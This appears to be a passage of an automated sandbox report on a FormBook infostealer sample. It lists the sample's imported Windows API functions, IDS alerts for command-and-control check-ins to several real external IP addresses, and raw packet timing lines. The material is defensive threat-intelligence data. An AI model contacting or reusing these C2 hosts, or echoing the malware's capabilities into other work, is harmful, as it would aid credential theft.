KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll   | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll    | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll  | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll    | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English                        | Great Britain
English                        | United States
Timestamp                       | SID     | Signature                                     | Severity | Source IP   | Source Port | Dest IP         | Dest Port | Protocol
2024-10-08T16:34:09.577337+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 49736       | 148.72.152.174  | 80        | TCP
2024-10-08T16:34:09.577337+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 49736       | 148.72.152.174  | 80        | TCP
2024-10-08T16:34:25.149111+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49807       | 3.33.130.190    | 80        | TCP
2024-10-08T16:34:27.700097+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49820       | 3.33.130.190    | 80        | TCP
2024-10-08T16:34:30.224719+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49838       | 3.33.130.190    | 80        | TCP
2024-10-08T16:34:32.773056+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 49854       | 3.33.130.190    | 80        | TCP
2024-10-08T16:34:32.773056+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 49854       | 3.33.130.190    | 80        | TCP
2024-10-08T16:34:38.867603+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49884       | 172.191.244.62  | 80        | TCP
2024-10-08T16:34:41.458048+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49898       | 172.191.244.62  | 80        | TCP
2024-10-08T16:34:44.172027+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49915       | 172.191.244.62  | 80        | TCP
2024-10-08T16:34:46.735729+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 49929       | 172.191.244.62  | 80        | TCP
2024-10-08T16:34:46.735729+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 49929       | 172.191.244.62  | 80        | TCP
2024-10-08T16:34:53.052676+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49965       | 172.96.191.39   | 80        | TCP
2024-10-08T16:34:55.405586+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49979       | 172.96.191.39   | 80        | TCP
2024-10-08T16:34:58.160208+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 49990       | 172.96.191.39   | 80        | TCP
2024-10-08T16:35:00.539585+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 50009       | 172.96.191.39   | 80        | TCP
2024-10-08T16:35:00.539585+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 50009       | 172.96.191.39   | 80        | TCP
2024-10-08T16:35:06.383956+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50017       | 217.70.184.50   | 80        | TCP
2024-10-08T16:35:09.393252+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50018       | 217.70.184.50   | 80        | TCP
2024-10-08T16:35:13.005498+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50019       | 217.70.184.50   | 80        | TCP
2024-10-08T16:35:14.675773+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 50020       | 217.70.184.50   | 80        | TCP
2024-10-08T16:35:14.675773+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 50020       | 217.70.184.50   | 80        | TCP
2024-10-08T16:35:21.787157+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50021       | 63.250.47.40    | 80        | TCP
2024-10-08T16:35:24.221471+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50022       | 63.250.47.40    | 80        | TCP
2024-10-08T16:35:26.921304+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50023       | 63.250.47.40    | 80        | TCP
2024-10-08T16:35:29.400431+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 50024       | 63.250.47.40    | 80        | TCP
2024-10-08T16:35:29.400431+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 50024       | 63.250.47.40    | 80        | TCP
2024-10-08T16:35:35.132418+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50025       | 91.184.0.200    | 80        | TCP
2024-10-08T16:35:37.638029+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50026       | 91.184.0.200    | 80        | TCP
2024-10-08T16:35:40.497999+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50027       | 91.184.0.200    | 80        | TCP
2024-10-08T16:35:42.903755+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 50028       | 91.184.0.200    | 80        | TCP
2024-10-08T16:35:42.903755+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 50028       | 91.184.0.200    | 80        | TCP
2024-10-08T16:35:48.432482+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50029       | 13.248.169.48   | 80        | TCP
2024-10-08T16:35:50.957525+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50030       | 13.248.169.48   | 80        | TCP
2024-10-08T16:35:53.691644+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50031       | 13.248.169.48   | 80        | TCP
2024-10-08T16:35:56.288842+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 50032       | 13.248.169.48   | 80        | TCP
2024-10-08T16:35:56.288842+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 50032       | 13.248.169.48   | 80        | TCP
2024-10-08T16:36:16.506159+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50037       | 43.242.202.169  | 80        | TCP
2024-10-08T16:36:19.055163+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50038       | 43.242.202.169  | 80        | TCP
2024-10-08T16:36:21.606190+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50039       | 43.242.202.169  | 80        | TCP
2024-10-08T16:36:24.175518+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5      | 1        | 192.168.2.4 | 50040       | 43.242.202.169  | 80        | TCP
2024-10-08T16:36:24.175518+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2   | 1        | 192.168.2.4 | 50040       | 43.242.202.169  | 80        | TCP
2024-10-08T16:36:30.319022+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3  | 1        | 192.168.2.4 | 50041       | 103.224.182.242 | 80        | TCP
                                                                        Oct 8, 2024 16:34:25.149024010 CEST80498073.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:25.149111032 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:26.192877054 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:26.197813988 CEST80498073.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.211678028 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:27.216702938 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.216767073 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:27.228100061 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:27.233050108 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.699974060 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.700097084 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:28.739753962 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:28.744945049 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.758759022 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:29.763880014 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.763995886 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:29.774672031 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:29.779748917 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779768944 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779786110 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779863119 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779876947 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779891014 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779913902 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779926062 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779953957 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:30.224636078 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:30.224719048 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:31.287240982 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:31.292191982 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.305491924 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.310749054 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.310869932 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.318255901 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.325514078 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.772227049 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.772968054 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.773056030 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.780472994 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.785564899 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:38.403012037 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:38.407989025 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.408092976 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:38.419114113 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:38.424256086 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.867480040 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.867502928 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.867603064 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:39.938807011 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.946279049 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.951642036 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:40.951719046 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.963867903 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.969177008 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:41.457806110 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:41.457828999 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:41.458048105 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:42.487567902 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.493277073 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.696053028 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.696171999 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.707895994 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.713068008 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713099003 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713218927 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713246107 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713272095 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713298082 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713344097 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713371038 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713402987 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:44.171924114 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:44.171955109 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:44.172027111 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:45.224143982 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.243208885 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.248229027 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.248337984 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.256012917 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.260890961 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.735551119 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.735637903 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.735728979 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.738580942 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.744456053 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:51.902340889 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:51.907360077 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:51.907814026 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:51.919229031 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:51.925033092 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.051943064 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.052614927 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.052628994 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.052675962 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:53.052757025 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:53.427376986 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.453739882 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.459564924 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:54.461858034 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.475677967 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.480849028 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:55.389796972 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:55.405531883 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:55.405586004 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:55.991724014 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.012412071 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.017330885 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.017407894 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.036194086 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.041307926 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.041384935 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.041822910 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.041956902 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042023897 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042032957 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042329073 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042382956 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042392015 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160095930 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160150051 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160178900 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160207987 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:58.160290956 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:58.552459002 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.596548080 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.602224112 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:59.602299929 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.613439083 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.618714094 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:00.539025068 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:00.539438963 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:00.539585114 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:35:00.543736935 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:35:00.548687935 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:05.723603010 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:05.728717089 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:05.728786945 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:05.742425919 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:05.747684002 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:06.383351088 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:06.383539915 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:06.383955956 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:07.255481958 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.275099039 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.789329052 CEST8050018217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:08.791902065 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.803767920 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.808928967 CEST8050018217.70.184.50192.168.2.4
